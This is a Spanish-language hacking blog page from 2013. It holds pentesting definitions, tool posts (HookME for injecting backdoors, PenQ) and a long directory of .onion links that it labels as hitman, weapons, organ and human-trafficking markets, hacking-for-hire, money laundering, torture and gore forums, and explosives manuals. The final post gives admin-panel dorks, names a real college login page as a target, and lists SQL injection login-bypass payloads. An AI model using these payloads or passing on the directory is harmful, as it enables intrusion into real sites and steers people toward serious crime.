¿Qué es un Pentest?

Una prueba de penetración, ocasionalmente llamado Pentest, es un método de evaluación de la seguridad de un sistema informático o red mediante la simulación de un ataque de las amenazas externas e internas,implica un análisis activo del sistema en busca de vulnerabilidades.

¿Qué es un exploit?

Un Exploit es un programa o código que "explota" una vulnerabilidad del sistema o de parte de él para aprovechar esta deficiencia en beneficio del creador del mismo.Generalmente se lo utiliza para otros fines como permitir el acceso a un sistema o como parte de otros malware como gusanos y troyanos.

¿Qué es la ingeniería social?

La ingeniería social también conocida como hackear humano, la ingeniería social es un acto de manipular la mente humana para conseguir los objetivos de deseo.Es un término general y en la vida cotidiana a todos implementarlo pero el uso de la ingeniería social en la piratería y las pruebas de penetración no es muy diferente.

¿Qué es la Post-explotación?

La tarea real que se realiza en el objetivo, que implica la descarga de un archivo, el cierre de un sistema hacia abajo, creando un nuevo usuario cuenta en el objetivo, y así sucesivamente, son parte de esta fase. Generalmente, esta fase describe lo que hay que hacer después de la explotación.

TCP Proxy (manipulación de datos)

Publicado Por Unknown // 12:56 // 18 jun 2013




Descripción:


HookME es un software diseñado para la interceptación de las comunicaciones mediante la conexión deseada y el proceso de conectar las llamadas a la API para enviar y recibir datos de la red (datos claros incluso SSL). HookMe Proporciona un agradable interfaz gráfica de usuario que le permite cambiar el contenido del paquete en tiempo real, caídas o de enviar el paquete. También cuenta con un plugin de sistema de python para ampliar la funcionalidad HookMe.
Se puede utilizar para muchos propósitos, tales como:

 Analizar y modificar protocolos de red
Creación de malware o backdoors embebido en protocolos de red
Vulnerabilidad Protocolo memoria de parches
Firewall en el protocolo de la capa
Como herramienta postexplotation
lo que usted puede crear con plugins usando su imaginación
Plugins
HookMe tener un sistema de plugins en Python. Usted puede desarrollar sus propios plugins o simplemente descargarlos desde nuestro repositorio, https://code.google.com/p/hookme/source/browse/ # svn% 2Ftrunk 2Fhookme%%% 2FScripts 2Fhook

 Además, si desea que el script aparezca aquí (se debe incluir los créditos) puede contactar en hookmesoftware@gmail.com.

Video Demo


 En este vídeo podemos ver cómo crear una puerta trasera con hookme y complementos de python que se inyecta en el proceso mysqld.exe permitir a un atacante ejecutar comandos remotos.





Descarga:

Etiquetas:

Reverse Shell

Publicado Por Unknown // 10:18 // 14 jun 2013

¿Que es Reverse Shell?

Es un troyano que llame a mi equipo atacante (y no al revés) y suministre una interfaz de comandos .
Este ejemplo me gusto


Descargar:

Etiquetas:

Navegador PenQ

Publicado Por Unknown // 11:43 // 10 jun 2013





PenQ es un navegador de código abierto Linux basada en pruebas que se han construido sobre Mozilla Firefox. Viene preconfigurado con herramientas de seguridad para spidering, búsqueda avanzada web, huellas digitales, navegación anónima, la exploración del servidor web, fuzzing, generación de informes y mucho más.
PenQ está configurado para ejecutarse en distribuciones basadas en Debian, Ubuntu y sus derivados distribuciones y sistemas operativos de pruebas de penetración, como BackTrack y Kali. Con todas sus integraciones, PenQ es una herramienta poderosa. Ser consciente de lo que utiliza lo pones a. Uso responsable de PenQ puede ayudar aplicaciones web seguras en un zap.

Características:

OWASP ZAP
OWASP WebScarab
OWASP WebSlayer
Nikto escáner de servidor Web
Wfuzz Web Application Fuzzer
Mozilla Add-ons Collection
Integrado Tor
OWASP Testing Checklist Penetración
Pentesting Report Generator
Bases de datos Búsqueda de Vulnerabilidad
El acceso a Shell y Utilidades del sistema
Colección de enlaces útiles

Descarga: 

http://www.qburst.com/products/PenQ


Etiquetas:

Deep web y Links vol.1

Publicado Por Unknown // 10:33 // 6 jun 2013





Para entender la deep web o “web profunda” primero debemos entender que las páginas que todo el mundo visita día a día pertenecen a la surface web o “web superficial”: Google, Yahoo, Wikipedia, Amazon, Ignomanía y tantas otras miles, pero la web no está compuesta sólo por la surface web que es la web que todos conocemos, sino también por la deep web, el lado oscuro de internet, una red de webs de difícil acceso al usuario común, donde pululan todo tipo de hackers, agentes del gobierno, altos cargos militares y las peores lacras de la sociedad, en la deep web se puede encontrar información que roza la ilegalidad o bien es completamente ilegal, páginas, foros, wikis, manuales, anuncios y artículos sobre: venta deórganos, venta de drogas, venta de armas, compra de artículos robados, hackers, contratación de sicarios, ebooks de todo tipo, pedofilia, necrofilia, zoofilia,violación y demás parafilias, canibalismo, guerrillas, asesinato, secretos corporativos, documentos clasificados de empresas o gobiernos, terrorismo mundial, tráfico de seres humanos y un gran etc. 

 Dentro de lo que está en la Deep Web, es obligatorio hablar de la red TOR, aunque después de la cantidad de formas de buscar datos en ella no parece que esté tan oculto, a priori. Sí que habría que tomarla como oculta al principio, ya que para navegar se necesitaba un cliente especial que debe ser instalado, pero desde que están los proxies que conectan la Web con la Deep Web, como por ejemplo Onion.To, ahora no parece que sea imprescindible ni ese software. Ya es posible, usando esos servicios buscar contenido y acceder a dominios .onion sin necesidad de ningún software especial en la máquina cliente.
El nacimiento de la red TOR estaba pensado no para tener contenidos ocultos, sino para garantizar anonimato a los clientes que se conectan y privacidad en el envío de la información entre los nodos, para, entre otras cosas, ayudar a las personas oprimidas y perseguidas en regímenes dictatoriales. En el informe de los Enemigos de Internet 2013 queda a las claras recogido como muchos gobiernos tienen un control de Internet total, y desde que se han publicado algunos programas de espionaje de la NSA, parece que esto lo hace la gran mayoría de los gobiernos.
Por supuesto, en la red TOR también se ocultan depredadores y delincuentes que quieren hacer su Agosto, como los vendedores de identidades y dinero falso, el mercado negro de armas, explosivos y drogas, o los llamativos asesinos a sueldo que se venden por un puñado de monedas electrónicas.
En el caso de las monedas electrónicas en la Deep Web, siempre se busca que las transacciones puedan ser tan anónimas como unos billetes entregados en un sobre, por lo que BitCoin, la moneda respaldada por capacidad de cómputo, es una de las más populares. 

Links vol.1



 Coleccion de link de la web profunda algunos link que he recolectado en diferentes lugares y que voy a ir actualizando cuando encuentre más los link no son peligrosos en un navegador común ya que se necesita Tor para que funcionen, no tengo mas que decir que tomen sus precauciones. Temas de interez drogas,hack,foros chan ,mercados negros, nada de pornografia.


Tiendas, comercios, venta y compra de mercancías






Cita:http://silkroadvb5piz3r.onion - SilkRoad o "el camino de la seda"
http://dkn255hz262ypmii.onion/ - foros del camino de la seda
http://5onwnspjvuk7cwvk.onion/ - el "Black Market"
http://426bznbgjzwd2nhp.onion - El sabor de DiMiTri: Mercante de etnobotánicos y psicoactivos.
http://4eiruntyxxbgfv7o.onion - el mercado de los Asesinos: contrata mercenarios o asesinos.
http://4eiruntyxxbgfv7o.onion/snapbbs/1b...dlist.php? - el mercado underground: compra y vende armas, organos y personas.
http://4eiruntyxxbgfv7o.onion/snapbbs/5595881d/ - el mercado de los ladrones
http://5onwnspjvuk7cwvk.onion/ <-el Mercado negro


Foros al estilo 4CHAN




Cita:http://zw3crggtadila2sg.onion/imageboard/ - TORCHAN
http://od6j46sy5zg7aqze.onion/ - ANONCHAN
http://wyxwerboi3awzy23.onion/ - HiddenImageSite
http://562tqunvqdece76h.onion/Lukochan/b/ - Lukochan
http://3suaolltfj2xjksb.onion/chan/ - Trichan
http://s6cco2jylmxqcdeh.onion/ - cebollachan: Chan en castellano.
http.//zqiirytam276uogb.onion - Thorlauta


Juegos







Servicios de la Hidden Web





Cita:http://k6gsb4ibatcico35.onion/ - REDDITor
http://lotjbov3gzzf23hc.onion/ - Tor Status (estilo Twitter)
http://utovvyhaflle76gh.onion/sTORage/ - Sube y descarga Archivos anónimamente en la Hidden Web.
http://f3ew3p7s6lbftqm5.onion/ - sube, descarga y comparte archivos en onion fileshare
http://627kx22vati6uqkw.onion/ - Pide que roben algo, y luego te lo venden por una fracción del precio.
http://4eiruntyxxbgfv7o.onion - TorPm: servicio de mensajeria secreta en Tor.
http://2v3o2fpukdlpk5nf.onion/ - HitMan: Otro asesino a sueldo.
http://4eiruntyxxbgfv7o.onion/snapbbs/sitedex.php - tu propio Board en Tor.
http://qaxjzemp2fhnwlhk.onion/ - Email Hacker: Escribele y hackeará mail a cambio de bitcoins.
http://n2wrix623bp7vvdc.onion/hackingservices.html - Servicios privados de jhacking para rentar. Rent-a-Hacker
http://f3ew3p7s6lbftqm5.onion/ - File Share Tor.
http://jhiwjjlqpyawmpjx.onion/ - Tor mail. mail gratuito.
http://4eiruntyxxbgfv7o.onion/imgzapr/ - ImgZap: Sube imagenes anónimamente.
http://xfq5l5p4g3eyrct7.onion/ - Onion Image Uploader
http://4eiruntyxxbgfv7o.onion/anonyshares.html - Annonymous File Sharing (archivos de hasta 10Mb)
http://ci3hn2uzjw2wby3z.onion/ - talk.Masked Foro abierto de texto (compatible con Tor mail).
http://iacgq6y2j2nfudy7.onion/ - Meet C´thulhu: Asesino a sueldo.
http://jd2iqa4yt7vqvu5o.onion/ - Contrata a un equipo de Swat por un módico precio.
http://4eiruntyxxbgfv7o.onion/paste/browse.php - servicio como el de PasteBin
http://c4wcxidkfhvmzhw6.onion/index.en.html - Privacybox.de: Caja tipo Dropbox para mensajes privados.
http://i7hknwg4up2jhdkx.onion - ES Simple Uploader
http://xfq5l5p4g3eyrct7.onion - Onion Image Uploader
http://3terbsb5mmmdyhse.onion - The hashparty ~ password cracking for Free
http://dg6exbqq42btatnw.onion - GNUnet files sharing
http://ay5kwknh6znfmcbb.onion/torbook/ - Torbook
http://xqz3u5drneuzhaeo.onion/users/badtornodes - Bad Tor nodes


Librerias, DIY,tutoriales, libros, material revolucionario o DIY





Cita:http://am4wuhz3zifexz5u.onion - The Tor Library
http://6sgjmi53igmg7fm7.onion/index.php?title=Main_Page - Budgetplanet: Bibloteca de Inteligencia Artificial y comunicacional.
http://am4wuhz3zifexz5u.onion/Library/En...Press_USA/ - Libros de la Prensa de Oxford.
http://http://p2uekn2yfvlvpzbu.onion/ - LiberaTor. Biblioteca revolucionaria DIY.
http://nwycvryrozllb42g.onion/ - Biblioteca de Thelema. Black Hat Hacking
http://am4wuhz3zifexz5u.onion/Library/ - Directorio con información gratuita en varios idiomas.
http://wf4df37hrebhwzts.onion - Web Design Guidelines: Onionland Style
http://xqz3u5drneuzhaeo.onion/users/heid.../000i.html - La libreria de heidenmut
http://pwjxmvlir72hep5u.onion/ - "Climbing Minds". Colección de Ebooks.
http://xqz3u5drneuzhaeo.onion/users/iskanderarchiv/ - biblioteca libre alexandrina.


Directorios de Tor





Cita:http://dppmfxaacucguzpc.onion/ - TOR DIR: El Directorio mas Completo de Tor
http://ahmia.fi/ - Almia.fi: otro directorio muy completo. También es buscador.
95.http://utovvyhaflle76gh.onion/sTORage/hiddenservices_adress_list.txt - Diviertete navegando !
http://ekwreugkil5ncyyh.onion/ - Directorio Annonymous Brazil
http://4eiruntyxxbgfv7o.onion/ - The circle
http://kpvz7ki2v5agwt35.onion - La Nueva Hidden Wiki
http://4jbxjjrbakmdcmvb.onion/ - TorMarks
http://xqz3u5drneuzhaeo.onion/users/astrokawa/ - La Cueva Pirata: Classificados en Tor.
http://x7yxqg5v4j6yzhti.onion/index.php/ - Onion book Mark

Buscadores



Cita:http://xmh57jrzrnw6insl.onion/ - Torch (search)
https://www.ixquick.com/ - Motor de Búsqueda Privado
http://www.deeppeep.org/ - DeepPeep
http://ahmia.fi/ - Ahmia
http://3g2upl4pq6kufc4m.onion/ - DuckDuck Go!


Foros - Varios





Cita:http://74ypjqjwf6oejmax.onion/ - Red de ductos de aire del Virginia Tech College, USA.
http://nel2xugswcy7qv7r.onion/ - psiquiatra Virtual (Habla con un psiquiarta Gratis!)
http://qdsuildbdofkrhe3.onion - Foro sobre anonimato en Tor (en Alemán)
http://6jzwxsoxmlefkkkl.onion/ - otro foro en alemán
http://6jzwxsoxmlefkkkl.onion - Otro Foro Alemán
http://eqt5g4fuenphqinx.onion/ - ONIONcore: el nucleo de la red .ONION
http://http://kpynyvym6xqi7wz2.onion/ - La web de parazite
http://65bgvta7yos3sce5.onion/ - OnionForum
http://32rfckwuorlf4dlv.onion/ - Foro anónimo de Tor
http://xqz3u5drneuzhaeo.onion/users/a1cerulean/ - Foro Tornado
http://46lm7zhgildryehk.onion/ - Un punto en la pantalla y ya.
http://5wfoimenm6fviv4d.onion/ - Foro sobre Drogas
http://4eiruntyxxbgfv7o.onion/snapbbs/77729de1/ - foro abierto sobre todos los temas de Tor.
http://nwycvryrozllb42g.onion/ - Destination unknown. Libreria de hackers para Hackers
http://7ymfzygewl4n6usp.onion - otro Foro en Alemán.
http://qm3monarchzifkwa.onion - Foro Anónimo BBS
http://clsvtzwzdgzkjda7.onion - HackBB: Foro de Black Hat hacking
http://s7nbvdbky4xqim7h.onion - galeria de genitales Masculinos de animales.
http://2ddjd7xsni7pefcx.onion - Europa para los Europeos: Web que muestra la frase neonazi "limpiando a europa de la mugre"
http://iwdmsbpxclyjhi4e.onion/ - web sobre el celular enV2
http://ar3ubs6cg6an4ylt.onion - beaglesnoop
http://j4ddjgxetfx2ybcx.onion - foro alemán Geheimkanal
http://xiwayy2kn32bo3ko.onion - ONION Channel
http://2dn2dmxt5uwnxz3j.onion/ - la web sobre los abusos judiciales en españa
http://6g2osf4l534bozmu.onion/ - RespiraTOR.
http://4eiruntyxxbgfv7o.onion/snapbbs/5112d4d2/ - Index de Sitios Comentados de Tor

Revolución!





Cita:http://hlmrraadkb646464.onion/ - Against Servants
http://a5ec6f6zcxtudtch.onion/index_en.htm - Web contra la ley ACTA
http://naot2jryja6iyrp5.onion/ - No a la castración animal.org
http://kpynyvym6xqi7wz2.onion/lyingninja.txt <-Aprenda a ser um mestre na arte de mentir.
http://kpynyvym6xqi7wz2.onion/fuksomeone.txt <-Como conseguir informações detalhadas de qualquer pessoa.http://kpynyvym6xqi7wz2.onion/success.txt <-Aprenda a ter sucesso sem talento.
http://kpynyvym6xqi7wz2.onion/iNFeCTioN_CooKBooK.txt <- Destrancar portas (até de carros), explosivos (incendiários, correios, granadas, ácido), trapacear os sistemas telefônicos, hacking, conseguir uma nova identidade, etc...
http://kpynyvym6xqi7wz2.onion/molitov.txt <-Fazendo um "cocktail molotov".
http://p2uekn2yfvlvpzbu.onion/arm/50calR...Manual.pdf <- rifle Calibre .50 Manual de Construccion, Bill Holmes


hosting en la HIdden Web



Cita:http://xqz3u5drneuzhaeo.onion/ - Freedom hosting

Gore




Cita:http://wtwfzc6ty2s6x4po.onion - Seakittens
http://xqz3u5drneuzhaeo.onion/users/experiments/ - The Human Experiment. Experimentacion sobre seres humanos.
http://7bm7p4ttba5tanme.onion/apply.html - Foro de Hurtcore, snuff y tortura.
http://xqz3u5drneuzhaeo.onion/users/penispanic/ - sitio dedicado a la mutilacion genital


Blogs y Warez


Cita:http://kv77v7n5kblz5tpw.onion/ El Blog de Croat´s
http://honeynetvg7i4lc6.onion/ Blog informático de Victor escudero Rubio
http://utup22qsb6ebeejs.onion/ My hidden Blog
http://pdjfyv7v3pn34w4f.onion House of Anonymous
http://qubsrxat5qsaw5u5.onion Blog en polaco
http://ay5kwknh6znfmcbb.onion/ enterrado en la darknet
http://xqz3u5drneuzhaeo.onion/users/mister/ Blog de Mister
http://sc3njt2i2j4fvqa3.onion/ - newzbin
http://xqz3u5drneuzhaeo.onion/users/dosbox2/ - ***** de software viejo de Windows
http://dts563ge5y7c2ika.onion/ - OnionWarez


Paranormal





Cita:http://uaga3aoawaj6hohg.onion/paranormalne/ - index de : lo paranormal ( en alemán)


Dinero y Bitcoins






Cita:http://yhngvp3q5h4s7d3e.onion/ La lavandería: lava tu dinero o tus bitcoins para difuminar tus transacciones

Etiquetas:

Bypass Admin Panel

Publicado Por Unknown // 10:00 // 4 jun 2013



Bueno en el siguiente post, veremos como bypasear un Login Panel, con una simple consulta SQL, la cual omitirá la necesidad de contar con un nombre de usuario admin y la contraseña para entrar en el panel.
Empezaremos con unas cuantas DORKS para conseguir un par de Admin Panels;

Dork
Código:
inurl:adminlogin.aspx   inurl:admin/index.php  inurl:administrator.php  inurl:administrator.asp  inurl:login.asp  inurl:login.aspx   inurl:login.php   inurl:admin/index.php  inurl:adminlogin.aspx

Y una consulta por ejemplo al Siguiente sitio web que obtuve con la Dork:
http://satyamcolleges.com/Webadmin/AdminLogin.aspx
User: 1'or'1'='1
Password: 1'or'1'='1



y listo, acceso al area de administracion
Aqui otro tipo de consultas.

‘ or 1=1 –
1'or’1'=’1
admin’–
” or 0=0 –
or 0=0 –
‘ or 0=0 #
” or 0=0 #
or 0=0 #
‘ or ‘x’='x
” or “x”=”x
‘) or (‘x’='x
‘ or 1=1–
” or 1=1–
or 1=1–
‘ or a=a–
” or “a”=”a
‘) or (‘a’='a
“) or (“a”=”a
hi” or “a”=”a
hi” or 1=1 –
hi’ or 1=1 –
hi’ or ‘a’='a
hi’) or (‘a’='a
hi”) or (“a”=”).
Etiquetas: